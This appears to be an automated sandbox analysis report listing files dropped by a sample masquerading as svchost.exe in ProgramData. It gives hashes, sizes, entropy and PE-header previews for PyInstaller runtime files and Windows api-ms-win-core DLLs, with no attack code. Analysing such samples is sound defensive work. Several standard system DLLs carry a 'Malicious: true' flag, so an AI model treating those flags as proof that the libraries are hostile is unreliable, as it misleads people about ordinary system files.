SHA-256:	925F05255F4AAE0997DC4EC94D900FD15950FD840685D5B8AA755427C7422B14
SHA-512:	CCC9F0D3ACA66729832F26BE12F8E7021834BBEE1F4A45DA9451B1AA5C2E63126C0031D223AF57CF71FAD2C85860782A56D78D8339B35720194DF139076E0772
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a............................................V...................V......V......V......V......Rich....................PE..d.....,d.........." .........6......................................................N.....`.........................................@C..L....C..d....p.......`.......L.../...........3..T...........................p3..8............0.. ............................text...~........................... ..`.rdata.......0......................@..@.data........P.......8..............@....pdata.......`.......<..............@..@.rsrc........p.......@..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\_socket.pyd

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	79128
Entropy (8bit):	6.284790077237953
Encrypted:	false
SSDEEP:	1536:ZmtvsXhgzrojAs9/s+S+pGLypbyxk/DDTBVILLwX7SyiPx9:c56OzyAs9/sT+pGLypb+k/XFVILLwX4f
MD5:	819166054FEC07EFCD1062F13C2147EE
SHA1:	93868EBCD6E013FDA9CD96D8065A1D70A66A2A26
SHA-256:	E6DEB751039CD5424A139708475CE83F9C042D43E650765A716CB4A924B07E4F
SHA-512:	DA3A440C94CB99B8AF7D2BC8F8F0631AE9C112BD04BADF200EDBF7EA0C48D012843B4A9FB9F1E6D3A9674FD3D4EB6F0FA78FD1121FAD1F01F3B981028538B666
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~...:...:...:...3.i.<...h...8...h...6...h...2...h...9.......8...:.......q...=.......;.......;.......;.......;...Rich:...........PE..d.....,d.........." .....l...........%.......................................P............`.............................................P............0....... ..<......../...@..........T..............................8............................................text...fj.......l.................. ..`.rdata..Ts.......t...p..............@..@.data...............................@....pdata..<.... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\_ssl.pyd

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	160536
Entropy (8bit):	6.027748879187965
Encrypted:	false
SSDEEP:	3072:OwYiZ+PtocHnVXhLlasuvMETxoEBA+nbUtGnBSonJCNI5ILC7Gax1:FYk+PtocHVxx/uvPCEwhGJ
MD5:	7910FB2AF40E81BEE211182CFFEC0A06
SHA1:	251482ED44840B3C75426DD8E3280059D2CA06C6
SHA-256:	D2A7999E234E33828888AD455BAA6AB101D90323579ABC1095B8C42F0F723B6F
SHA-512:	BFE6506FEB27A592FE9CF1DB7D567D0D07F148EF1A2C969F1E4F7F29740C6BB8CCF946131E65FE5AA8EDE371686C272B0860BD4C0C223195AAA1A44F59301B27
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C.-...-...-.....-...,...-...(...-...)...-.......-.W.,...-.R.,...-...,...-...,...-.W. ...-.W.-...-.W....-.W./...-.Rich..-.................PE..d.....,d.........." ................l*..............................................%.....`.............................................d...........`.......P.......D.../...p..8.......T...............................8............................................text...(........................... ..`.rdata..6...........................@..@.data....j.......f..................@....pdata.......P....... ..............@..@.rsrc........`.......,..............@..@.reloc..8....p.......6..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-console-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22128
Entropy (8bit):	4.746916379473427
Encrypted:	false
SSDEEP:	192:HFOhEWhhW9DWGxVA6VWQ4iW7rd9ZnAOVX01k9z3AAcodV:HFdWhhWhxdm31AqR9z7BV
MD5:	40BA4A99BF4911A3BCA41F5E3412291F
SHA1:	C9A0E81EB698A419169D462BCD04D96EAA21D278
SHA-256:	AF0E561BB3B2A13AA5CA9DFC9BC53C852BAD85075261AF6EF6825E19E71483A6
SHA-512:	F11B98FF588C2E8A88FDD61D267AA46DC5240D8E6E2BFEEA174231EDA3AFFC90B991FF9AAE80F7CEA412AFC54092DE5857159569496D47026F8833757C455C23
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....dZ..........." .........0...............................................@............`A........................................p...,............0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-datetime-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.597173095457187
Encrypted:	false
SSDEEP:	192:LWhhW8R9WvkJ0f5AbVWQ4mWC7ZNKd2kQX01k9z3Ad4+BhNKD:LWhhWgaab/NNPR9zw4fD
MD5:	C5E3E5DF803C9A6D906F3859355298E1
SHA1:	0ECD85619EE5CE0A47FF840652A7C7EF33E73CF4
SHA-256:	956773A969A6213F4685C21702B9ED5BD984E063CF8188ACBB6D55B1D6CCBD4E
SHA-512:	DEEDEF8EAAC9089F0004B6814862371B276FBCC8DF45BA7F87324B2354710050D22382C601EF8B4E2C5A26C8318203E589AA4CAF05EB2E80E9E8C87FD863DFC9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....N7.........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-debug-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22128
Entropy (8bit):	4.609345057720842
Encrypted:	false
SSDEEP:	192:9WhhW1WGxVA6VWQ4cRWAAuENQlO8X01k9z3AenFbvrJ:9WhhWhxdleuEKlO8R9zhFHJ
MD5:	71F1D24C7659171EAFEF4774E5623113
SHA1:	8712556B19ED9F80B9D4B6687DECFEB671AD3BFE
SHA-256:	C45034620A5BB4A16E7DD0AFF235CC695A5516A4194F4FEC608B89EABD63EEEF
SHA-512:	0A14C03365ADB96A0AD539F8E8D8333C042668046CEA63C0D11C75BE0A228646EA5B3FBD6719C29580B8BAAEB7A28DC027AF3DE10082C07E089CDDA43D5C467A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....IL..........." .........0...............................................@............`A........................................p................0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-errorhandling-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22112
Entropy (8bit):	4.640577240680024
Encrypted:	false
SSDEEP:	192:IzmxD3T4qbWhhWNc5WvkJ0f5AbVWQ4OWXIH52mvp13s5yX01k9z3A3MNL3:IzQNWhhWNchaabdHMmfcYR9zEMNr
MD5:	F1534C43C775D2CCEB86F03DF4A5657D
SHA1:	9ED81E2AD243965E1090523B0C915E1D1D34B9E1
SHA-256:	6E6BFDC656F0CF22FABBA1A25A42B46120B1833D846F2008952FE39FE4E57AB2
SHA-512:	62919D33C7225B7B7F97FAF4A59791F417037704EB970CB1CB8C50610E6B2E86052480CDBA771E4FAD9D06454C955F83DDB4AEA2A057725385460617B48F86A7
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d................." .........0...............................................@............`A........................................p................0...............0..`&..............p............................................................................rdata..H...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	26224
Entropy (8bit):	4.864482970861573
Encrypted:	false
SSDEEP:	192:xaNYPvVX8rFTsiWhhWWnWGxVA6VWQ4cRWtlAd9ZnAOVX01k9z3AAcosm6:nPvVXkWhhWQxdlP31AqR9z76
MD5:	EA00855213F278D9804105E5045E2882
SHA1:	07C6141E993B21C4AA27A6C2048BA0CFF4A75793
SHA-256:	F2F74A801F05AB014D514F0F1D0B3DA50396E6506196D8BECCC484CD969621A6
SHA-512:	B23B78B7BD4138BB213B9A33120854249308BB2CF0D136676174C3D61852A0AC362271A24955939F04813CC228CD75B3E62210382A33444165C6E20B5E0A7F24
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....(............" .........@...............................................P............`A........................................p................@...............@..p&..............p............................................................................rdata..\|........ ..................@..@.data........0......................@....rsrc........@.......0..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l1-2-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.615608208407289
Encrypted:	false
SSDEEP:	192:4TGaWhhWMWvkJ0f5AbVWQ4cRWhW9qUd9ZnAOVX01k9z3AAcoXXcX:4qaWhhWIaablbR31AqR9z77MX
MD5:	BCB8B9F6606D4094270B6D9B2ED92139
SHA1:	BD55E985DB649EADCB444857BEED397362A2BA7B
SHA-256:	FA18D63A117153E2ACE5400ED89B0806E96F0627D9DB935906BE9294A3038118
SHA-512:	869B2B38FD528B033B3EC17A4144D818E42242B83D7BE48E2E6DA6992111758B302F48F52E0DD76BECB526A90A2B040CE143C6D4F0E009A513017F06B9A8F2B9
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....RS.........." .........0...............................................@............`A........................................p...L............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-file-l2-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	18696
Entropy (8bit):	7.054510010549814
Encrypted:	false
SSDEEP:	384:eVrW1hWbvm0GftpBjzH4m3S9gTlUK3dsl:eVuAViaB/6sl
MD5:	BFFFA7117FD9B1622C66D949BAC3F1D7
SHA1:	402B7B8F8DCFD321B1D12FC85A1EE5137A5569B2
SHA-256:	1EA267A2E6284F17DD548C6F2285E19F7EDB15D6E737A55391140CE5CB95225E
SHA-512:	B319CC7B436B1BE165CDF6FFCAB8A87FE29DE78F7E0B14C8F562BE160481FB5483289BD5956FDC1D8660DA7A3F86D8EEDE35C6CC2B7C3D4C852DECF4B2DCDB7F
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3A..w e.w e.w e..De.v e..Da.u e..D..v e..Dg.v e.Richw e.........PE..d...4.F>.........." .........................................................0............`.........................................`................ ...................=..............T............................................................................rdata..............................@..@.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-handle-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22128
Entropy (8bit):	4.625038284904601
Encrypted:	false
SSDEEP:	192:9jWhhWmWGxVA6VWQ4cRWMj656CqRqNX01k9z3A8oXblIHNQ:9jWhhWSxdlE5DNR9zrG6Ha
MD5:	D584C1E0F0A0B568FCE0EFD728255515
SHA1:	2E5CE6D4655C391F2B2F24FC207FDF0E6CD0CC2A
SHA-256:	3DE40A35254E3E0E0C6DB162155D5E79768A6664B33466BF603516F3743EFB18
SHA-512:	C7D1489BF81E552C022493BB5A3CD95CCC81DBEDAAA8FDC0048CACBD087913F90B366EEB4BF72BF4A56923541D978B80D7691D96DBBC845625F102C271072C42
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....Hb..........." .........0...............................................@............`A........................................p...`............0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-heap-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.723757189784349
Encrypted:	false
SSDEEP:	192:bdxlxWhhWWWvkJ0f5AbVWQ4cRWKmX56CqRqNX01k9z3A8oXjl:bdxlxWhhW2aablm5DNR9zrG
MD5:	6168023BDB7A9DDC69042BEECADBE811
SHA1:	54EE35ABAE5173F7DC6DAFC143AE329E79EC4B70
SHA-256:	4EA8399DEBE9D3AE00559D82BC99E4E26F310934D3FD1D1F61177342CF526062
SHA-512:	F1016797F42403BB204D4B15D75D25091C5A0AB8389061420E1E126D2214190A08F02E2862A2AE564770397E677B5BCDD2779AB948E6A3E639AA77B94D0B3F6C
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....B.l.........." .........0...............................................@......).....`A........................................p................0...............0..h&..............p............................................................................rdata..\|...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-interlocked-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.654830959351148
Encrypted:	false
SSDEEP:	192:r4WhhWWsWvkJ0f5AbVWQ4cRWsQOZD2X01k9z3AG2hqvz:0WhhWRaablKZR9zVQM
MD5:	4F631924E3F102301DAC36B514BE7666
SHA1:	B3740A0ACDAF3FBA60505A135B903E88ACB48279
SHA-256:	E2406077621DCE39984DA779F4D436C534A31C5E863DB1F65DE5939D962157AF
SHA-512:	56F9FB629675525CBE84A29D44105B9587A9359663085B62F3FBE3EEA66451DA829B1B6F888606BC79754B6B814CA4A1B215F04F301EFE4DB0D969187D6F76F1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...}.o..........." .........0...............................................@......x.....`A........................................p................0...............0..h&..............p............................................................................rdata..L...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-libraryloader-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.868673796157719
Encrypted:	false
SSDEEP:	192:oTvuBL3BBLIWhhW5WvkJ0f5AbVWQ4cRWsmIngqtVVwX01k9z3Acqk3:oTvuBL3BaWhhWhaablkqVwR9zHR
MD5:	8DFC224C610DD47C6EC95E80068B40C5
SHA1:	178356B790759DC9908835E567EDFB67420FBAAC
SHA-256:	7B8C7E09030DF8CDC899B9162452105F8BAEB03CA847E552A57F7C81197762F2
SHA-512:	FE5BE81BFCE4A0442DD1901721F36B1E2EFCDCEE1FDD31D7612AD5676E6C5AE5E23E9A96B2789CB42B7B26E813347F0C02614937C561016F1563F0887E69BBEE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....g..........." .........0...............................................@......fK....`A........................................p................0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-localization-l1-2-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22128
Entropy (8bit):	5.357912030694384
Encrypted:	false
SSDEEP:	384:jnaOMw3zdp3bwjGzue9/0jCRrndbnWhhWRxdlF5DNR9zrGDLC:mOMwBprwjGzue9/0jCRrndbemr9zay
MD5:	20DDF543A1ABE7AEE845DE1EC1D3AA8E
SHA1:	0EAF5DE57369E1DB7F275A2FFFD2D2C9E5AF65BF
SHA-256:	D045A72C3E4D21165E9372F76B44FF116446C1E0C221D9CEA3AB0A1134A310E8
SHA-512:	96DD48DF315A7EEA280CA3DA0965A937A649EE77A82A1049E3D09B234439F7D927D7FB749073D7AF1B23DADB643978B70DCDADC6C503FE850B512B0C9C1C78DD
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...0.&3.........." .........0...............................................@............`A........................................p................0...............0..p&..............p............................................................................rdata..D...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-memory-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.755674101565431
Encrypted:	false
SSDEEP:	192:q8WhhWUWvkJ0f5AbVWQ4cRW9RvBwUoX01k9z3AuJGzx:q8WhhWgaablSUR9zxk
MD5:	C4098D0E952519161F4FD4846EC2B7FC
SHA1:	8138CA7EB3015FC617620F05530E4D939CAFBD77
SHA-256:	51B2103E0576B790D5F5FDACB42AF5DAC357F1FD37AFBAAF4C462241C90694B4
SHA-512:	95AA4C7071BC3E3FA4DB80742F587A0B80A452415C816003E894D2582832CF6EAC645A26408145245D4DEABE71F00ECCF6ADB38867206BEDD5AA0A6413D241F5
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...`.@f.........." .........0...............................................@......E.....`A........................................p...l............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-namedpipe-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22128
Entropy (8bit):	4.706939855964842
Encrypted:	false
SSDEEP:	192:vyWhhWQWGxVA6VWQ4cRWzco456CqRqNX01k9z3A8oXdlxG:KWhhWoxdlvo45DNR9zrGhG
MD5:	EAF36A1EAD954DE087C5AA7AC4B4ADAD
SHA1:	9DD6BC47E60EF90794A57C3A84967B3062F73C3C
SHA-256:	CDBA9DC9AF63EBD38301A2E7E52391343EFEB54349FC2D9B4EE7B6BF4F9CF6EB
SHA-512:	1AF9E60BF5C186CED5877A7FA690D9690B854FAA7E6B87B0365521EAFB7497FB7370AC023DB344A6A92DB2544B5BDC6E2744C03B10C286EBBF4F57C6CA3722CF
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...j............" .........0...............................................@.......Y....`A........................................p................0...............0..p&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-processenvironment-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.879924502333097
Encrypted:	false
SSDEEP:	192:nEFPmWhhWiWvkJ0f5AbVWQ4cRWdEnZBwUoX01k9z3AuJGzCM:EFuWhhW6aablNZUR9zx
MD5:	8711E4075FA47880A2CB2BB3013B801A
SHA1:	B7CEEC13E3D943F26DEF4C8A93935315C8BB1AC3
SHA-256:	5BCC3A2D7D651BB1ECC41AA8CD171B5F2B634745E58A8503B702E43AEE7CD8C6
SHA-512:	7370E4ACB298B2E690CCD234BD6C95E81A5B870AE225BC0AD8FA80F4473A85E44ACC6159502085FE664075AFA940CFF3DE8363304B66A193AC970CED1BA60AAE
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d...L.Y..........." .........0...............................................@...........`A........................................p...H............0...............0..h&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-processthreads-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	5.227317911828185
Encrypted:	false
SSDEEP:	384:Lck1JzNcKSI8WhhWCaabl5ujezWSR9zchTL:TcKS+Hznwq9zS
MD5:	8E6EB11588FA9625B68960A46A9B1391
SHA1:	FF81F0B3562E846194D330FADF2AB12872BE8245
SHA-256:	AE56E19DA96204E7A9CDC0000F96A7EF15086A9FE1F686687CB2D6FBCB037CD6
SHA-512:	FDB97D1367852403245FC82CB1467942105E4D9DB0DE7CF13A73658905139BB9AE961044BEB0A0870429A1E26FE00FC922FBD823BD43F30F825863CAD2C22CEA
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d....O.j.........." .........0...............................................@......=M....`A........................................p................0...............0..h&..............p............................................................................rdata..d...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-processthreads-l1-1-1.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.788678681522991
Encrypted:	false
SSDEEP:	192:fkDfIecWhhW/WvkJ0f5AbVWQ4cRWSXgp13s5yX01k9z3A3MLGO:fkDfIecWhhWLaabl4cYR9zEM3
MD5:	4380D56A3B83CA19EA269747C9B8302B
SHA1:	0C4427F6F0F367D180D37FC10ECBE6534EF6469C
SHA-256:	A79C7F86462D8AB8A7B73A3F9E469514F57F9FE456326BE3727352B092B6B14A
SHA-512:	1C29C335C55F5F896526C8EE0F7160211FD457C1F1B98915BCC141112F8A730E1A92391AB96688CBB7287E81E6814CC86E3B057E0A6129CBB02892108BFAFAF4
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....#..........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..\...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-profile-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	4.583429497884519
Encrypted:	false
SSDEEP:	192:SWhhWpWvkJ0f5AbVWQ4cRWlwbx56CqRqNX01k9z3A8oXnlSP:SWhhWRaablbN5DNR9zrGQ
MD5:	9082D23943B0AA48D6AF804A2F3609A2
SHA1:	C11B4E12B743E260E8B3C22C9FACE83653D02EFE
SHA-256:	7ECC2E3FE61F9166FF53C28D7CB172A243D94C148D3EF13545BC077748F39267
SHA-512:	88434A2B996ED156D5EFFBB7960B10401831E9B2C9421A0029D2D8FA651B9411F973E988565221894633E9FFCD6512F687AFBB302EFE2273D4D1282335EE361D
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......e.........." .........0...............................................@............`A........................................p................0...............0..h&..............p............................................................................rdata..P...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-rtlsupport-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22112
Entropy (8bit):	4.750751888281197
Encrypted:	false
SSDEEP:	192:xGeVvWhhWN6WvkJ0f5AbVWQ4OW7bplZD2X01k9z3AG2LzS4:xGeVvWhhWNCaab2pyR9zV2zS4
MD5:	772F1B596A7338F8EA9DDFF9ABA9447D
SHA1:	CDA9F4B9808E9CEF2AEAC2AC6E7CDF0E8687C4C5
SHA-256:	CC1BFCE8FE6F9973CCA15D7DFCF339918538C629E6524F10F1931AE8E1CD63B4
SHA-512:	8C94890C8F0E0A8E716C777431022C2F77B69EBFAA495D541E2D3312AE1DA307361D172EFCE94590963D17FE3FCAC8599DCABE32AB56E01B4D9CF9B4F0478277
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d......Z.........." .........0...............................................@......7.....`A........................................p...<............0...............0..`&..............p............................................................................rdata..............................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-string-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22128
Entropy (8bit):	4.664471809242636
Encrypted:	false
SSDEEP:	192:7ZyMvrRWhhW8WGxVA6VWQ4cRWquEg56CqRqNX01k9z3A8oXW98laI:7ZyMvdWhhW8xdlq5DNR9zrG2o
MD5:	84B1347E681E7C8883C3DC0069D6D6FA
SHA1:	9E62148A2368724CA68DFA5D146A7B95C710C2F2
SHA-256:	1CB48031891B967E2F93FDD416B0324D481ABDE3838198E76BC2D0CA99C4FD09
SHA-512:	093097A49080AEC187500E2A9E9C8CCD01F134A3D8DC8AB982E9981B9DE400DAE657222C20FB250368ECDDC73B764B2F4453AB84756B908FCB16DF690D3F4479
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........v...v...v..~...v..v...v..r...v.....v..t...v.Rich..v.................PE..d.....I..........." .........0...............................................@.......t....`A........................................p................0...............0..p&..............p............................................................................rdata..l...........................@..@.data........ ......................@....rsrc........0....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\_MEI49442\api-ms-win-core-synch-l1-1-0.dll

Download File

Process:	C:\ProgramData\svchost.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	22120
Entropy (8bit):	5.1446624716472735
Encrypted:	false
SSDEEP:	384:xEwidv3V0dfpkXc0vVaCUWhhWHaablKR9zVR:aHdv3VqpkXc0vVa4qzE9z
MD5:	6EA31229D13A2A4B723D446F4242425B
SHA1:	036E888B35281E73B89DA1B0807EA8E89B139791
SHA-256:	8ECCABA9321DF69182EE3FDB8FC7D0E7615AE9AD3B8CA53806ED47F4867395AE
